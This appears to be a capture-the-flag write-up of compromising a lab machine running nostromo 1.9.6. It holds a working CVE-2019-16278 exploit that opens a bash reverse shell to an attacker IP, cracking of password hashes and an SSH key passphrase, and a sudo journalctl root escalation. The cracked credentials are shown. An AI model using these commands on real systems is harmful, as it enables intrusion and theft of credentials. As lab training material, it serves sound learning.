nmap -sT -p- --min-rate 5000 10.10.10.165 -Pn
Let's do greater nmap for 22,80 open ports.
nmap -sC -sV -A -p22,80 10.10.10.165 -Pn
Here, I just learn that HTTP port is running via software called and version of this like ' nostromo 1.9.6 '
Let's search exploit for this.
I found this (CVE-2019-16278)
I did this by manually, let's look at this.
I send POST request like below.
And I got result on reverse connection.
Now, it's time to reverse shell, below one is our reverse shell payload, let's look at this.
curl -s -X POST 'http://10.10.10.165/.%0d./.%0d./.%0d./bin/sh' -d '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.16.6/1337 0>&1"'
I got reverse shell.
Let's make interactive shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash
After enumeration of linux machine, I find interesint file that contains username and hashed password on this directory (/var/nostromo/conf/.htpasswd)
Let's try to crack this hash.
hashcat -m 500 hash.txt --wordlist /usr/share/wordlists/rockyou.txt
Now we can see that password is Nowonly4me
david: Nowonly4me
This credentials is just for 10.10.10.165/~david/
endpoint.
Another interesting directory, I find that '/home/david/public_www/protected-file-area', here we have file, let's send to our machine.
Then, I see that, I need to enter this username and password to get this file.
wget http://david:Nowonly4me@10.10.10.165/~david/protected-file-area/backup-ssh-identity-files.tgz
And we extract like below.
tar -zxvf backup-ssh-identity-files.tgz
Let's change privilege and try to login via SSH.
I see that it asks passphrase from me, let's do ssh2john
tool to find passphrase.
ssh2john home/david/.ssh/id_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
passphrase is hunter.
I changed file permission of id_rsa file and connect to machine.
chmod 600 home/david/.ssh/id_rsa
ssh -i home/david/.ssh/id_rsa david@10.10.10.165
user.txt
For privilege escalation, I find interesting path (/home/david/bin), there is bash script which runs via sudo privileges, that's why I checked GTFObins
I need to run as below.
stty rows 4
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
#!/bin/sh
root.txt